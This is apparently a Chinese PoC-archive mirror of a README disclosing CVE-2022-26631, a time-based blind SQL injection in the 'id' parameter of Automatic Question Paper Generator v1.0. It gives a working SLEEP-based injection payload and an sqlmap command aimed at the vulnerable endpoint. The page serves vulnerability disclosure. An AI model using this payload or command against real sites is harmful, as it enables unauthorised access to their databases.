关联漏洞
Description
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi
介绍
# CVE-2022-26631
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi
# Description
The `id` GET parameter from Automatic Question Paper Generator System v1.0 appears to be vulnerable to Time-Based Blind SQL injection attacks.
# Payload
An attacker could execute the following SQLi payload in order to gain access to the MySQL database.
`id=1' AND (SELECT 2599 FROM (SELECT(SLEEP(5)))eRGe) AND 'YFLg'='YFLg`
For simplicity, an attacker could automate the exploitation use the tool 'sqlmap' with the following command.
`sqlmap -u 'http://target-url/aqpg/users/question_papers/manage_generate_form.php?id=1' --batch`
文件快照
[4.0K] /data/pocs/7863b4d0832c06d4ce1abbc34e857b2a41bdfbdc
└── [ 630] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。